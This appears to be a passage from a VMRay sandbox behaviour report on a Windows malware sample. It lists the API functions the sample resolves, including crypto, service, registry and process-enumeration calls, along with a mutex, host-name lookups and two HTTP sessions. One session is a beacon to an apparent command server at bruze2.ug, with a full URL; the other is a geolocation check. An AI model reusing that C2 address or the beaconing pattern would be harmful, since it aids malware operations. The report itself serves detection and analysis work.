Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x77095063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7709170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7709492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x770910ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x770b830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x77094620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x770bd556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x77091072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x77093ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x77093f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x770b2b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x770933a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x77095929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7709192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x77091700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7709469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x770b594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x770959e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x770911c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x770911a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x77091222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x770a9af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x77094442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x770b8baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x7709168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x7709183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x770914b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x770b896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x770b828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x77094c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x77114691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x770b735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x77091410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x770989b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x77092d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x770b3102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x77095444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x770b2a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x770acf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x770934b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x7709dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x770a174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x77094950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x77095558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x77094467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x770bd526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x770934d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x770914fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x770911e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x770949ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x77091916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x770987c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x770b772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x770951cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x770951e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x770911f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x77091725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x77094d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x777445f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x7709465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x770958a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x77091946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77743002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7709495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7773e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x77093c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x770ace46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x77093da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x7711425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x770b34d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x770af481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x77093bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x770917b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x77137bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x77091328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77751f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x7711454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x770ace2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x770951b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x77093531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x77094a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x770b7aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadConsoleW, address_out = 0x7713739a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x770bd1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x77098a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x770bd1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77732270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x777322b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x771140d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x770914e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x77091450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x770917ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x77095189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x770914c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x7709e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77750fcb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77749d35 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x77093509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x77091809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x770aca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x770bd1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x7709179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x77094493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x77095235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x770954ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x77094a5d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x766388f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x76637809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7663b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x76640dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x76637136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x76638a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x76643559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x777425dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x766405ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x76638bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x7668fd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7663787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x76639abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x76639a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x76639679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x766378e2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x7535df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x7535df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x7535ca64 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x7535ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x7535e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x7536157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x7535df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x753614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x7536469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x7535df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x75377144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x7536468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x7535df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x7537779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x7535c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x75362a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x753646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x7536369c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x759917bf True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7598e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75919ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x75b47078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75921e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x754eb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x754f7259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x755186d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75519d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7563fd6b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75634642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75633eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75633ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75633e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75633f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75635dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75634af8 True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74de9263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x7530b131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x7530311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75317673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74d9572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74d8436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x76f95d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x74cdc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x77114751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x77191544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x77191408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7719152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x75985708 True 58
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System (257)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Get Time type = System Time, time = 2019-07-19 06:58:33 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 6627012196 True 1
Fn
Get Time type = Ticks, time = 23088 True 59
Fn
Get Time type = Ticks, time = 23103 True 143
Fn
Get Time type = Ticks, time = 23119 True 47
Fn
Get Time type = System Time, time = 2019-07-19 06:58:36 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 6906187687 True 1
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (2)
»
Information Value
Total Data Sent 636 bytes
Total Data Received 7.49 KB
Contacted Host Count 2
Contacted Hosts 77.123.139.189, 47.252.0.194
HTTP Session #1
»
Information Value
User Agent Microsoft Internet Explorer
Server Name bruze2.ug
Server Port 80
Username -
Password -
Data Sent 169 bytes
Data Received 307 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = bruze2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /ASd3457oHOIUSDhfsuft33i76t21/95898398498ihsdfasd/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://bruze2.ug/ASd3457oHOIUSDhfsuft33i76t21/95898398498ihsdfasd/get.php?pid=0E11F5E4125223A10BC64F8C25940F2B True 1
Fn
Read Response size = 1024, size_out = 103 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.19 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 465 True 1
Fn
Data
Close Session - True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image